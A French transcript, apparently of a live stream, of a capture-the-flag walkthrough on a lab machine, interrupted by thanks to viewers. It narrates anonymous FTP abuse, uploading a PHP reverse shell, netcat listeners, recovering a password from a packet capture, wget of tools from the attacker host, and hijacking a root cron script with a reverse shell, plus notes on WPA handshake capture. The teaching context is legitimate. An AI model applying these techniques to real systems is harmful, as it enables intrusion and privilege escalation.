Startup. Quel est l'ingrédient secret de la soupe épicée? Comment on dit piment en anglais? Pepper. Ah ouais. Il y a 2 P non en plus. Ça rentre pas. L'ingrédient secret de la soupe épicée, c'est pas le piment du coup. Première chose à faire, un nmap. Un nmap. Ok, là on a des choses. Maintenant je lance le nmap un peu poussé. Tac. Alors on a un FTP, on a un SSH, on a un HTTP. On va regarder le HTTP déjà. Mais je vais aussi jeter un œil vite fait au FTP. Rapidement. Je vais faire FTP sur l'IP. Name, je vais mettre Anonymous. Et pas de mot de passe. Login successful. LS. Bon, déjà, il y a une faille. C'est que déjà FTP est activé, c'est déjà une faille. Parce que FTP, c'est un protocole en clair. C'est déjà une faille en vrai. Mais il n'y a pas que ça, il y a FTP, il faut s'assurer qu'on ne puisse pas s'authentifier avec une session Anonymous. Or, c'est le cas ici. On a pu s'authentifier avec une session Anonymous. Donc, après, la question c'est est-ce qu'il y a des fichiers là-dedans? La réponse est oui. Donc, j'ai envie de récupérer, je vais faire get notice.txt. Je vais faire get important.jpg. Je vais faire cd ftp ls. Et il n'y a rien. ls-a. Et il n'y a rien. C'est important de faire un ls-a pour vérifier qu'il n'y a pas des fichiers cachés. Et qu'est-ce que je vois là? Je vois qu'il y en a un. Test.log. Mais il a l'air de faire 0 octet. Je vais quand même le prendre. Get. Test.log. Ok. Site. Bye. Ok. ls. Alors, je vais rm l'ancien fichier de l'ancien challenge. Notice. Cat notice. Whoever is leaving these damn Among Us memes, it is not funny. People downloading documents from our website will think we are a joke. I don't know who it is, but Maya is looking pretty suspect. Maya, on a un username. Maya. Important.jpg. C'est une image qui m'a l'air intéressante. On n'est plus dans un challenge de stéganographie, donc jusqu'à preuve du contraire, il n'y aura pas de la stéganographie. Je vais juste afficher l'image. Everybody asks who is the impostor, but nobody asks how's the impostor. Je vois un petit mot là, mais ça a l'air d'être la référence. Aditya XD. Alors peut-être qu'il y a de la stéganographie là. File important. Strings important. Je sais pas. Je pense que je vais pas trop creuser la stéganographie ici pour l'instant. Effectivement, c'est une image de Among Us, ouais. Je vais retourner ici, sur le site, et je vais continuer à rechercher. Ici, je vais faire un GoBuster. GoBuster dir -u l'url-w user chair wordlist dir buster directory 2.3 medium dans le but d'essayer de trouver des dossiers, donc brute forcer les dossiers du site web. Alors le site est encore en cours de développement, vous pouvez nous contacter, sinon machin, signer la dev team. Je vois pas de username. No spice here. Maintenance, ok. Quand on regarde le GoBuster, on voit qu'il y a Files. Donc j'ai envie d'aller dans Files. /Files. Ah. Ah ouais. Donc on arrive à faire du directory listing sur un dossier web dans lequel on a les droits d'écriture. Enfin, on a les droits de lecture, mais peut-être aussi d'écriture avec FTP. Je vais essayer du coup d'uploader quelque chose du style un reverse shell. Là, on est sur du Apache, ça a l'air d'être du Linux. D'ailleurs, si je ping la machine et que son TTL représente quelque chose de autour de 64, ping la machine. Autour de 64, effectivement, on est à un hop de la machine, donc c'est a priori du Linux. Si c'est du Linux, j'ai besoin d'un reverse shell Linux. Donc je vais faire copie de home tools php reverse shell. Ok, ici. Je vais le changer parce que le nom est un peu trop complexe. Je vais le modifier en shell.php. Et ls. Et maintenant, je vais essayer d'uploader shell.php via FTP. Donc FTP de l'IP. Anonymous. Un mot de passe null. Ok. ls. Ici, je vais faire put shell.php. Et je vais aller dans FTP aussi. Je vais faire put shell.php. Pourquoi je le mets dans deux endroits?
Parce que je me dis que peut-être le serveur web va interpréter le code PHP à cet endroit-là. Ah, j'ai pas réussi à le put apparemment. Et dans FTP, j'ai réussi à le put. Bon voilà, je me dis peut-être qu'il y a un dossier qui est interprétable et peut-être un autre qui ne l'est pas. Bon, en l'occurrence, could not create file. Par contre, dans le dossier FTP, oui, on peut créer des fichiers. Je pouvais faire un ls-a, L. J'ai poussé un reverse shell, mais sans le modifier. Alors, je vais le modifier tout de suite. Mon IP local, ça va être celle-là. Change this. Donc, il y a marqué changer ici. Je fais I pour éditer. Coller. Et mon port, je vais mettre 9999. Échappe 2.wq. Je vais retourner sur le FTP d'abord. Anonymous null et je vais cd ftp ls. Et donc là, il y a mon shell.php. Est-ce que je peux le help? Comment on supprime? C'est del ou remove ou rm? FTP delete. Delete shell.php. Et maintenant put./shell.php. Voilà, maintenant on est bon. By nc-lnvp 9999. Est-ce que maintenant je peux lancer ça et avoir un reverse shell? Oui. La réponse est oui. Et je suis 3W data. Je veux un shell TTY maintenant. Alors which Python? Est-ce qu'il y a Python? Oui. Donc quand on a Python, c'est très facile d'avoir un shell TTY. Il suffit de faire python-c import pty pty.spawn /bin/bash fermer ça. Et donc on obtient un reverse shell. Tac. PTY Interactive Shell, ça permet d'avoir un shell plus stable. Ensuite, qu'est-ce qu'on va faire? ID. Alors, où je suis? À slash, ok. Je vais aller dans /home pour voir s'il y a des gens. Je vois Lenny, cd Lenny. Denied, ok. Je vais dans... je vais faire 4 etc passwd pour voir les users. Alors 4 /etc /passwd pipe grep-v /bin/false anti/pipe. Je veux pas voir /bin/false. Je veux pas non plus voir no login. Voilà. Donc ça donne ça. Pas de compte Maya, on me dit dans le chat. Eh ben non. Maya devait être quelqu'un d'autre, mais je vois le compte Vagrant, Lenny et FTP Secure. Alors FTP Secure, ça doit être le compte qu'on avait quand on était en mode Anonymous. Et Vagrant, ça a l'air d'être un software, parce qu'à la racine, c'est des slash. J'avais vu le mot Vagrant. Je vois recipe.txt, cat recipe.txt. I told him it was love. Donc c'était de l'amour, l'ingrédient secret. De la soupe. Donc love, secret ingredient. Quel est le contenu de user.txt? Pour ça, il faut compromettre Lenny, puisque dans home, on a vu qu'il y avait Lenny. ls/home, il y a Lenny. Je peux pas faire ls/home/Lenny. Permission denied. Alors, qu'est-ce que je peux faire? Il y a incident intéressant peut-être. J'ai envie de voir dedans vite fait. Suspicious pickup. Ah oui, d'accord, c'est intéressant. Trop intéressant ça. Je vais le télécharger. Pcap ng. Donc pcap ça veut dire packet capture. C'est un fichier Wireshark. Et ng c'est pour dire next generation. Donc c'est sans doute un peu plus compressé. C'est comme les docx. En gros pcap ng est à Wireshark ce que docx est à Word. En gros, je veux d'abord voir s'il y a netcat. Il y est. Donc je vais faire un netcat sur ma machine attaquante, sur le port, je sais pas, 9001, et je vais y rediriger le fichier suspicious. Mais d'abord, avant de faire ça, je vais mettre en écoute sur le port 9001 et rediriger l'output vers suspicious.pcapng. Et je vais me le transférer comme ça avec netcat. Hop, c'est fait. ls, j'ai récupéré mon fichier suspicious. Je fais un file dessus pour vérifier ce que c'est. Et effectivement, pkpng capture file. Et c'est quelque chose qu'on pourra ouvrir avec Wireshark. Donc je lance Wireshark.
hop, suspicious.pcap. Donc ça, c'est des incidents apparemment. Donc on va regarder l'analyse du fichier pcap. Tu peux craquer une clé WPA avec une capture réseau. Je croyais que c'était possible que pour web. Oui, tu peux, mais il te manque... Alors pour le web, tu peux. Il faut qu'il y ait assez de données, bien sûr. Par contre, pour du WPA, tu peux, mais il te faut avoir capturé le 4-way handshake, c'est-à-dire il faut avoir capturé un client qui se connecte au Wi-Fi et il va envoyer une info ce qu'on appelle un 4-way handshake, donc c'est une poignée de main en 4 temps. Il faut faire de la deauthentication. Donc en gros, il faut désauthentifier un client qui est connecté à son Wi-Fi WPA et aussitôt, si c'est un Windows, par défaut, ça va se reconnecter tout seul. Et comme ça va se reconnecter, tu vas capturer le fameux 4-way handshake. Et donc pouvoir craquer. Mais par contre, tu vas le craquer basé sur un dictionnaire. Alors que web, tu peux craquer ce que tu veux. Le mot de passe peut être le plus complexe du monde. Tu vas le craquer de toute façon. Tu vas y arriver. Pour peu que tu aies assez de données. Et que tu saches le faire. Mais WPA, si tu n'as pas le mot de passe dans un dictionnaire, tu ne l'auras pas craqué. Et donc, il faut générer un dictionnaire en fonction de comment pourrait être générée la clé en face. Je regarde les protocoles. Je vois TCP. Je vois TLS. Donc, il y a des trucs chiffrés qu'on verra pas. Je vois HTTP. Ça, c'est des trucs qu'on verra. En clair. DNS. Ok, donc peut-être qu'il réseau des machines. Je vais voir du TCP, etc. Du RP, bon, du HTTP. Alors, c'est très intéressant aussi d'analyser les data téléphonie. Bon, là, on n'en a pas. Dans File, je vais faire Export Objects HTTP, puisque j'ai vu du HTTP. J'ai pas vu les autres protocoles. Donc HTTP. On voit un favicon. On voit un favicon encore. On voit shell.php. Je vais regarder ça. Shell.php. Je vais faire clic droit. Follow HTTP stream. Je vais faire. Et je vais regarder. Je crois que c'est littéralement ce que moi j'ai exécuté, non? Donc ça, c'est pas mon IP. Donc le reverse shell ici, c'est pas le mien. Files /ftp /shell.php. C'est bon pour les objets, hein. Y a pas grand chose d'autre. Je vais faire un... Je regarde un peu les autres data. Je regarde l'ASCII ici. wdata. Ah ouais, on voit littéralement toutes mes commandes là, non? Dans le sniff. ls-la, c'est moi qui ai fait ça. C'est marrant, hein? Je crois hein, que c'est moi qui fais ça. Who am I? Non, j'ai pas tapé who am I. Lenny, permission denied. Ouais, comme ça, si je fais... Voilà. On voit les commandes là. ls-la. Who am I? On génère un pty. cd Lenny. Ah! Vous avez vu ça? Donc c'était pas mes logs à moi. C'est dingue parce que j'ai fait quasiment les mêmes commandes que le mec en fait. J'ai récupéré une des commandes du socket TCP là, qui correspond au reverse shell. On voit d'ailleurs que les IP, source et destination, bah, c'est l'IP d'une autre personne. Ce n'est pas la mienne ni la target. Donc c'est la preuve que c'était en fait des logs de quelqu'un d'autre. Follow TCP stream et là on voit tout le flux TCP. Et là on voit que quelqu'un a fait un sudo-l en tant que 3wdata et que le mot de passe de 3wdata c'est ça. Donc 3wdata password égale ça. On va le mettre comme ça pour l'afficher plus propre. Et voilà, 4 etc passwd, après il a fait d'autres trucs. Ok, donc ce fichier Wireshark était très intéressant. Si je fais maintenant sudo-l et que je mets ce mot de passe, est-ce que ça marche? Donc ça, c'est pas le mot de passe de 3wdata. Ce mot de passe, il y a peut-être du password reuse, donc peut-être que c'est le mot de passe de Lenny. Il y avait du SSH, non? Oui, il y a SSH, effectivement. Maintenant, ma question, c'est est-ce que c'est pas le mot de passe de Lenny? Donc si je fais un SSH de Lenny, et merci pour le follow, Gina Hello. Ah, c'est sympa. Merci pour le subscribe. Merci. Purée, c'est le premier subscribe. Mon premier sub. Merci, c'est super sympa. Super cool. Le premier sub de ma chaîne. Merci. Je pensais pas l'avoir aujourd'hui puisque... Eh, hey, merci Security Live.
C'est super cool. C'est super sympa. Je configurerai les icônes comme il se devrait, en temps et en heure. Purée, merci Sonid. C'est fou. Le train de la hype. C'est trop cool les gars, merci. Purée. Je pensais pas qu'il y aurait tout ça les gars. C'est super sympa, merci. C'est très gentil. Très gentil de me soutenir. Allez, Lipé, Lenny, @Lipé. Yes. Et est-ce qu'il y a du mot de passe reuse? Il y en a. Yes. Bon, c'est bon, je l'ai mérité le sub alors du coup, puisque j'ai réussi à... Ah ben merci Exes. Allez, je te suis depuis une semaine. Ah merci, merci, merci. Non, c'est pas que... Ouais, c'est super sympa. Alors le train de la hype, il y est là. Merci. Oh là là, merci Security Live. Sympa les gars. Sympa, merci beaucoup. Je vais le faire que demain quoi. Merci, merci Durzel. Sacré Durzel. Et on a le flag. Merci Durzel, c'est sympa. Tu suis attentivement mes lives, j'espère. En tout cas, merci à tous, ça fait vraiment plaisir. Par contre, c'était le mot de passe de... Merci Particule de Dieu, c'est super. Waouh, ok. Gifted 10 subs. Ah ouais, d'accord. Purée. Ben merci, t'es super généreux. Super sympa. Super sympa. Et merci pour le follow, Porek. Pourquoi le boson de Higgs est appelé particule de Dieu? L'expression vient du livre du Nobel Leon Lederman, The God Particle. L'ouvrage de ce scientifique est consacré à la physique des particules et à la quête ultime de cette discipline, la découverte du boson de Higgs. C'est le deuxième nom du boson de Higgs. Et je vais vous montrer PSPy, l'outil PSPy. SSH Lenny @Lipé. Et le mot de passe, ça sera ce mot de passe. 64 par exemple. Voilà celui-là. Et ça, c'est un truc qui va monitorer les process exécutés en temps réel et ça va nous afficher download. Et je vais faire wget de http://mon IP /pspy64. Voilà, ls chmod plus x pspy64 et je vais le lancer. Je vais le relancer. // mais je vais pipe grep UID égale 0. Comme ça, j'aurai que les UID 0 dans PSPy. C'est pour voir les process où je me trompe. Exactement, en fait, ça va voir les process en temps réel et ça va monitorer toutes les commandes qui pourraient être exécutées régulièrement. Donc là, je vais faire plein de touches entrée. Tiens, c'est quoi ça? Home Lenny. Ah, ben on l'a déjà vu là. Vous voyez? L'UID 0, donc root, a exécuté cette commande-là. Et ici, l'UID 0 a exécuté cette commande-là. Planner.sh. Donc ça nous confirme que root exécute régulièrement ce script.sh. Et là, j'ai fait plein d'entrées pour que ça pop ici en bas quand ça va se rafraîchir. Quand root va exécuter une commande, je vais le voir ici en fait. Ça permet d'espionner aussi les commandes des autres utilisateurs. PSPy très utile. Et là, en l'occurrence, il y a un cron tab qu'on ne peut pas voir qui va exécuter des commandes de planner.sh. Donc ça nous conforte dans l'idée que planner.sh, il faut en faire quelque chose. Par contre, quand je fais cat, alors si je fais ls-l, je vois que je peux pas le modifier. Planner.sh, j'ai pas les droits de le modifier, il appartient à root. Si je fais un cat de planner, par contre, il fait un écho de $list et ensuite il exécute print.sh. ls-l de print.sh. Oh, vous avez vu? Vous avez compris ou pas? C'est bon. On est root en fait là. C'est réglé. Le problème est réglé. On est allé trop loin. Il y avait beaucoup plus simple. Donc, je retourne sur l'autre onglet pour que vous voyez. Effectivement, on a attendu à 19h59 et 1 seconde. Ça exécute planner.sh, puis encore planner.sh, puis encore planner.sh. De plusieurs manières possibles. Ça, c'est le cron tab de root qui fait ça. Vous voyez, PSPy, c'est génial. Et donc, planner.sh, on ne peut pas le modifier. Par contre, ça exécute un autre script qui, lui, appartient à Lenny. Donc, on peut le modifier. Seul Lenny peut le modifier. Mais root peut également l'exécuter. Notamment au travers de l'autre script. Donc, si on modifie
4 etcprint.sh. Il y a marqué echo down. Si je fais vim et que je le modifie et qu'à la place je mets pas echo down ou que je laisse echo down mais que je rajoute un reverse shell et j'en télécharge un, le premier, celui-là, avec ceci et que je mets un port, je ne sais pas, 9, on va mettre 9500, N4-LNVP 9500 et je mets cette commande là dans mon vim, je sauvegarde, vous me suivez? Et là, prochaine fois que root exécute le script, on aura un shell. Ah ben voilà, ça s'est exécuté. Donc j'ai un shell et je suis root. C'est clair? C'est simple en fait. Et donc je peux aller 4 root.txt. Bingo! GG! Merci!